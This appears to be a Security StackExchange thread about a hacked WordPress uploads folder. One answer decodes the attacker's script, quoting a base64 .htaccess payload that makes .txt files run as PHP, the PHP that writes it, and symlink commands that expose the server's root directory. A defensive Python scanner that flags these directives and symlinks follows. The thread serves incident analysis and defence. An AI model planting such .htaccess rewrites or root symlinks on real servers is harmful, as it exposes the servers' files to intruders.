How did the hacker get access to my WordPress upload folder?
https://security.stackexchange.com/questions/96000/how-did-the-hacker-get-access-to-my-wordpress-upload-folder
Once the file is uploaded to the server (exploiting a bug in a WordPress theme), the .htaccess is reconfigured in a way that any .txt file will be interpreted by the server as a .php script and it will follow symlinks.
The next step is the trick: he makes a symlink from / to Donnazmi.txt (2 ways).
The code isn't really complex; it prints an HTML form with the needed configs to run the exploit steps (you need to send a POST request with Donnazmi as a post key to see it).
Code explained:
.htaccess reconfig:
$fvckem = 'T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
This is a base64 encoded string, which translates into:
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
So with that config:
$file = fopen(".htaccess", "w+");                  // open the file
$write = fwrite($file, base64_decode($fvckem));    // write the new config inside the file
Symlinks:
// 1. this is a link made with the Linux command `ln`
system('ln -s / Donnazmi.txt');
// 2. this is a link made with the PHP native function
$Donnazmi = symlink("/", "Donnazmi.txt");
After the execution, each time he visits example.com/Donnazmi.txt he sees a list of the root directory of your server (Options Indexes).
So yes, rebuild that machine, and check the software before installing it.
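As an added defender's check (not code from this answer, WordPress or the attacker's script), here is a small Python scanner that flags the .htaccess directives the answer describes (Indexes, FollowSymLinks, and AddType/AddHandler lines involving php) and lists symlinks under a web directory that resolve outside it. The demo builds a constructed uploads folder in a temp directory containing exactly that .htaccess and a Donnazmi.txt link to /.

```python
import os
import re
import tempfile

# Directives set by the malicious .htaccess in the answer above.
RISKY_OPTIONS = {"followsymlinks", "indexes"}
OPTIONS_RE = re.compile(r"^Options\s+(.+)$", re.I)
HANDLER_RE = re.compile(r"^Add(Type|Handler)\b", re.I)


def scan_htaccess(text):
    """Return the directives in an .htaccess that enable the attack above."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        m = OPTIONS_RE.match(line)
        if m:
            for opt in m.group(1).split():
                # "-Indexes" disables the option; only plain or "+" forms count.
                if not opt.startswith("-") and opt.lstrip("+").lower() in RISKY_OPTIONS:
                    findings.append(f"Options {opt}")
            continue
        # Any AddType/AddHandler mentioning php in an uploads dir is suspect, whatever the argument order.
        if HANDLER_RE.match(line) and "php" in line.lower():
            findings.append(line)
    return findings


def escaping_symlinks(web_root):
    """Return (link, target) pairs for symlinks that resolve outside web_root."""
    root = os.path.realpath(web_root)
    hits = []
    for dirpath, dirnames, filenames in os.walk(web_root):  # does not follow links
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                target = os.path.realpath(path)
                if os.path.commonpath([root, target]) != root:
                    hits.append((path, os.readlink(path)))
    return hits


def demo():
    """Constructed sample: an uploads dir holding the answer's .htaccess and symlink."""
    uploads = tempfile.mkdtemp(prefix="uploads-")
    with open(os.path.join(uploads, ".htaccess"), "w") as fh:
        fh.write("Options Indexes FollowSymLinks\nDirectoryIndex ssssss.htm\n"
                 "AddType txt .php\nAddHandler txt .php\n")
    os.symlink("/", os.path.join(uploads, "Donnazmi.txt"))
    findings = scan_htaccess(open(os.path.join(uploads, ".htaccess")).read())
    return findings, escaping_symlinks(uploads)
```

Run `demo()` (or point `scan_htaccess` / `escaping_symlinks` at a real wp-content/uploads) to get the flagged directives and the escaping links; a clean uploads .htaccess such as `php_flag engine off` with `Options -Indexes -FollowSymLinks` produces no findings.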
The video that I found was the first thing to come up when I googled the hacker's name.
Do you have WordPress Cold Fusion theme installed by any chance?
Here is the so-called Mauritania Attacker's video explaining how he exploits the specific WordPress theme to upload files on the server.